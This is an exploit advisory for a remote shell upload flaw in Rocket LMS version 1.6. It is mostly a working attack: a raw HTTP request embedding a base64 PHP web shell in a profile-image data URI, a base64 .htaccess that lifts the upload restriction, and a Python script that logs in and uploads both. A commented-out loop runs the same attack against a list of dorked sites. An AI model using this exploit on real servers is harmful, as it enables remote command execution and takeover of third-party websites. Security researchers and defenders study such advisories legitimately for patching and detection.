Rocket LMS version 1.6 suffers from a remote shell upload vulnerability.
# Exploit Title: Rocket LMS - Learning Management System Shell Upload
# Exploit Author: th3d1gger
# Vendor Homepage: https://codecanyon.net
# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735
# Version: Version 1.6
# Tested on Ubuntu 18.04
base64 encode your payload
after data image write your extension
upload
-----
There is .htaccess restriction on rocket lms public folder upload your own htaccess to avatar folder first.
Enjoy!
-------Request-----------
POST /panel/setting HTTP/1.1
Host: localhost
Content-Length: 214
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Origin: http://localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: empty
Referer: http://localhost/panel/setting/step/2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlBhNzBxQi96TVJwTm5KdEI0Ry9xUUE9PSIsInZhbHVlIjoiUE80Y2h6WlU2N3FjZDBaMldkZU1pcDg3ZmVLWitZSUxsQVBIc0lHdUV0ZkdtL2JYYzZ0Q2RsL1JSQXhVZWFJZGsrcGlOTGJ5Qk8zWWlTVDVWL3ZlNEY3NFpEc1RaT0NSVS9EL2lFWXQyTEtLQXlFR0RPVjREclI4QkMwdWRQb3hzcEtlZ1ZZanQ0ZDAyYWZOMjNjcWo1anFtSFdRdFYwY2laTlJLbnl2TjBVQWdKTlB6Uk4reWlJUTRNSmkrYkhXU1BJMmxpNU05TngxUklxNEM5azY0bFp4NVg2eHdwT1VSci9Od2RCQklsMD0iLCJtYWMiOiI2NzFjZDkxMDRlYWEyODBmMGUxNDg3YmFmZmQ0M2YwMzhlMmViNTYxYjk3YTZmNTk0YzA1MGFkOGY2YmFkN2I1In0%3D; XSRF-TOKEN=eyJpdiI6IjRqa1JIMXQrd0xuZW1za0FXR0lVbGc9PSIsInZhbHVlIjoidXlybG4rTlRraVpXV1dRSE5EWXcrYnVyZnpYUHRmSmpvQ0tuUUI3WEFDZU5HdWpsbXJBRi9WaStzWXVDNEJLa2UzT3BTSkdobzdPc0dUb0V1TzUyMGdPVHRHY3NNR0x2YlpVT1YxMy9DYXVIMGxERktaZXZtT1pPQUF4Y0N6U0IiLCJtYWMiOiI2MTAyMGJlZmFhNjk2ZWRiOWViYjVlZWNhOWUyYzFmYTJjNjdmYTdmZWNmY2ZhMTFjMTg3NmQwMDAxNjg1OTVjIn0%3D; rocketlms_session=eyJpdiI6Ik1yOGpZZmFGRnJMY1BBYkNBVUhYT1E9PSIsInZhbHVlIjoiOWkrN1JmUHhqc21qTlZqdytPdUJaSnpPQW0ybXNlVGpWLzViVzFpbHpheUF2QUJYRTJNUmpCaC9xZk5CRWg1eGpiVFZ4ejFOOTdLZ3NmNTkrQlhheTBBUGNVVDdPa3IvVWVSeTZ3RndxV2FRdWpWRnVvSHhzY2xKUjMvelB4dTAiLCJtYWMiOiIzNTdlNTNmNGNlMDFlMTU5NWVlOTQ1NjM0YjFjZGU4NWJmMTg5NzIzNmRhMTQxMzc4MDIyZGU2ZDM2N2JiODg2In0%3D
Connection: close
_token=vILAoLnB2BFEaF35K4kMmwLokzOPLMnryeYXQVzS&step=2&next_step=0&profile_image=data%3Aimage%2FPHP%3Bbase64%2CPD9waHAgJGNtZCA9IHN5c3RlbSgkX0dFVFsnY21kJ10pOwoKZWNobyAkY21kOwo/Pg==
&cover_img=%2Fstore%2F995%2F7.jpg
Exploit:
import time
import requests
import base64
import re
import traceback
class Rocket:
def __init__(self,ssl,host,port,email,password,file):
self._url_to_upload = "/panel/setting"
self._url_to_login = "/login"
self.host = host
self.port = port
self.ssl = ssl
self.email = email
self.password = password
self.file = file
def get_csrf_token(self,client,URL):
fromt = client.get(URL)
if 'XSRF-TOKEN' in client.cookies:
csrftoken = re.findall(r'<input type="hidden" name="_token" value="(.*)"',fromt.text)[0]
return csrftoken
else:
print("Error while fetching token")
return
def login(self):
client = requests.session()
if self.ssl == True:
ssl= "https://"
else:
ssl= "http://"
URL = str(ssl+self.host+":"+self.port+self._url_to_login)
URL2 = str(ssl+self.host+":"+self.port+self._url_to_upload)
csrftoken = self.get_csrf_token(client,URL)
fromt = client.get(URL) # sets cookie
login_data = dict(username=self.email, password=self.password, _token=csrftoken, next='/panel')
r = client.post(URL, data=login_data, cookies=client.cookies)
self.upload_shell(client,URL2)
self.upload_htaccess(client,URL2)
def upload_shell(self,client,URL):
csrftoken = self.get_csrf_token(client,URL)
with open(self.file,"r") as payload:
to_base64 = payload.read()
to_base64 = str(to_base64).encode("utf-8")
base64_encoded_data= base64.b64encode(to_base64)
base64_encoded_data = str(base64_encoded_data)[:-1]
base64_encoded_data = str(base64_encoded_data)[2:]
string = "data:image/php;base64,"+str(base64_encoded_data)
data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")
r = client.post(URL, data=data, cookies=client.cookies)
print(r.status_code)
if r.status_code == 200:
print("sent and uploaded shell :"+URL+"n")
else:
print("couldn't upload shell")
def upload_htaccess(self,client,URL):
csrftoken = self.get_csrf_token(client,URL)
string = "data:image/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4="
data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")
r = client.post(URL, data=data, cookies=client.cookies)
print(r.status_code)
if r.status_code == 200:
print("sent and uploaded htaccess:"+URL+"n")
print("Go and rename file in filemanager on website")
else:
print("couldn't upload htaccess")
elon = Rocket(True,"localhost","443","[email protected]","student" ,"/home/mm1nd/Desktop/shell.txt")
elon.login()
#with dork
# try:
# with open("sites.txt","r") as urls:
# url = urls.readlines()
# ssl = True
# port = 443
# for line in url:
# try:
# if "sslyok" in line:
# port = 80
# ssl = False
# line = str(line.rstrip('%0a'))
# print("trying:"+line)
# elon = Rocket(ssl,line.rstrip("n"),str(port),"[email protected]","student" ,"/home/mm1nd/Desktop/shell.txt")
# elon.login()
# time.sleep(1)
# except Exception:
# #traceback.print_exc()
# print("atamadim")
# finally:
# print("okey")
# except Exception:
# print("atamadim")
